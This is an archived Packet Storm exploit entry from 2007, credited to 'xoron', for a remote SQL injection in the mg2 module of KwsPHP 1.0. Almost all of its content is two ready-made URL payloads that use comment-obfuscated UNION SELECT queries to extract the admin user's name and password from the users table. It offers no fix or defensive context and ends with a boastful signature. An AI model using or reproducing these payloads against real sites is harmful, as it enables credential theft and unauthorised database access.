kwsphpmg2-sql.txt

2007-10-15T00:00:00
ID PACKETSTORM:60093
Type packetstorm
Reporter XORON
Modified 2007-10-15T00:00:00

Description

                                        
                                            `--------------------  
  
KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit  
  
--------------------  
  
Found : xoron  
  
--------------------  
  
Exploit:  
  
Name:  
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pseudo,3,4,5/**/from/**/users/**/where/**/id=1/*  
  
Pass:  
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pass,3,4,5/**/from/**/users/**/where/**/id=1/*  
  
--------------------  
  
Bundan sonra hep tek, hep yek xoron..!  
  
--------------------  
`